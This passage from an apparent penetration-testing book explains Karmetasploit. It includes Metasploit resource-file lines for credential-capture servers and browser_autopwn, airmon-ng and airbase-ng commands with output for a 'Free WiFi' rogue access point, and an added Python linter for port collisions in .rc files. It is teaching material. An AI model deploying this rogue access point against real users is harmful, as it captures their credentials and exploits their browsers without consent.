Karmetasploit

set SRVPORT 55550
set URIPATH /ads
run

use auxiliary/server/capture/pop3
set SRVPORT 110
set SSL false
run

After connecting to the database in which it will store its results (db_connect postgres:toor@127.0.0.1/msfbook), KARMA loads the browser_autopwn server, as shown in the resource file. This is a handy way to attempt a number of exploits against a browser in an untargeted manner: a handful of the browser-based exploits in the Framework contain the directive include Msf::Exploit::Remote::BrowserAutopwn, and every exploit that contains that include line is attempted when the autopwn server is accessed.

The resource file also sets the local IP address (in two places) to 10.0.0.1, which coincides with the default DHCP configuration, and the lines that follow configure and start the various servers, each on its own port. (To get a complete picture of what occurs in this attack, read the resource file in full.)
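Because every capture server in the resource file needs its own SRVPORT and the same local address, a mistake in that file fails quietly: msfconsole prints a bind error for the second module on a port and carries on. The following linter is an added example for this page, not part of Metasploit or of the book's karma.rc. It replays the few msfconsole commands such a file uses (db_connect, use, set, setg, run) with msfconsole's scoping rules, where setg values apply to every module and set values belong to the module currently selected with use, and reports port collisions, servers with no explicit SRVPORT, and LHOST/AUTOPWN_HOST values that disagree. The SAMPLE_RC text inside it is constructed for the example, modelled on the fragment above with a deliberate collision added; it is not the real file.

```python
"""Added example: a linter for a Metasploit resource (.rc) file such as karma.rc.
Not part of Metasploit or of the book; SAMPLE_RC is constructed for this example."""
from collections import defaultdict

# Constructed sample, modelled on the karma.rc fragment in the text, with one
# deliberate mistake: two capture servers both try to bind port 110.
SAMPLE_RC = """\
db_connect postgres:toor@127.0.0.1/msfbook
use auxiliary/server/browser_autopwn
setg AUTOPWN_HOST 10.0.0.1
setg AUTOPWN_PORT 55550
setg AUTOPWN_URI /ads
set LHOST 10.0.0.1
set LPORT 45000
set SRVPORT 55550
set URIPATH /ads
run

use auxiliary/server/capture/pop3
set SRVPORT 110
set SSL false
run

use auxiliary/server/capture/imap
set SRVPORT 110
set SSL false
run
"""

SERVER_PREFIX = "auxiliary/server/"   # modules that bind a listening socket


def parse_rc(text):
    """Replay the file; return one record per `run` with the datastore in
    effect at that moment (setg globals overlaid by the module's own sets)."""
    global_opts, local_opts, module, runs = {}, {}, None, []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()      # msfconsole ignores # comments
        if not line:
            continue
        cmd, *args = line.split()
        if cmd == "use" and args:
            module, local_opts = args[0], {}     # fresh datastore per module
        elif cmd == "setg" and len(args) >= 2:
            global_opts[args[0].upper()] = " ".join(args[1:])
        elif cmd == "set" and len(args) >= 2:
            local_opts[args[0].upper()] = " ".join(args[1:])
        elif cmd in ("run", "exploit"):
            runs.append({"line": lineno, "module": module,
                         "datastore": {**global_opts, **local_opts}})
        # db_connect and any other command leave the datastore alone
    return runs


def lint_rc(text):
    """Return human-readable findings; an empty list means the file is clean."""
    findings, bound, local_addrs = [], defaultdict(list), set()
    for run in parse_rc(text):
        ds, module, line = run["datastore"], run["module"], run["line"]
        if module is None:
            findings.append(f"line {line}: run with no module selected")
            continue
        if module.startswith(SERVER_PREFIX):
            port = ds.get("SRVPORT", "")
            if not port.isdigit():
                findings.append(f"line {line}: {module} has no explicit SRVPORT")
            else:
                # Key on the port alone: a server on 0.0.0.0 overlaps every
                # specific SRVHOST, so port-only is the conservative check.
                bound[int(port)].append(run)
        for key in ("LHOST", "AUTOPWN_HOST"):   # both must name the same local IP
            if key in ds:
                local_addrs.add(ds[key])
    for port, runs in bound.items():
        if len(runs) > 1:
            who = ", ".join(f"{r['module']} (line {r['line']})" for r in runs)
            findings.append(f"port collision on port {port}: {who}")
    if len(local_addrs) > 1:
        findings.append("LHOST/AUTOPWN_HOST disagree: " + ", ".join(sorted(local_addrs)))
    return findings


def privileged_ports(text):
    """Server ports below 1024; binding them needs root, hence the root@bt prompt."""
    ports = set()
    for run in parse_rc(text):
        port = run["datastore"].get("SRVPORT", "")
        if run["module"] and run["module"].startswith(SERVER_PREFIX) \
                and port.isdigit() and int(port) < 1024:
            ports.add(int(port))
    return sorted(ports)


if __name__ == "__main__":
    for finding in lint_rc(SAMPLE_RC) or ["no findings"]:
        print(finding)
    print("privileged ports (start msfconsole as root):", privileged_ports(SAMPLE_RC))
```

Run it against your own resource file before msfconsole -r; a finding of "port collision" means the second server never comes up and clients talking to that port reach the first one, not the capture module you expected.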

Next, we place our wireless card in monitor mode. The way in which we do this depends on our wireless card's chipset. The wireless card in the following example uses the RT73 chipset. We use airmon-ng start wlan0 to place it in monitor mode:

root@bt:/opt/metasploit3/msf3# airmon-ng start wlan0

NOTE  If your card uses a different chipset from the one used in this example, visit the Aircrack-ng website (http://www.aircrack-ng.org/) for specifics on how to place your card in monitor mode.

Launching the Attack

The airbase-ng component of the Aircrack-ng suite is used to create Karmetasploit's fake access point. In the next example, we configure the airbase-ng access point to respond to all probes, whatever ESSID the client asks for (-P); to also beacon every ESSID it has seen a client probe for, for 30 seconds each (-C 30); to use the ESSID Free WiFi (-e "Free WiFi"); and to be verbose (-v), all on the monitor-mode interface mon0:

root@bt:/opt/metasploit3/msf3# airbase-ng -P -C 30 -e "Free WiFi" -v mon0
14:06:57  Created tap interface at0
14:06:57  Trying to set MTU on at0 to 1500
14:06:57  Trying to set MTU on mon0 to 1800
14:06:57  Access Point with BSSID 00:21:29:E2:DE:14 started.

As you can see in the output, airbase-ng creates a new interface called at0. This TAP interface is the wired side of the fake access point: traffic from every client that associates with Free WiFi arrives on it, so it is the interface that will carry the 10.0.0.1 address the resource file expects, and Karmetasploit will use this interface.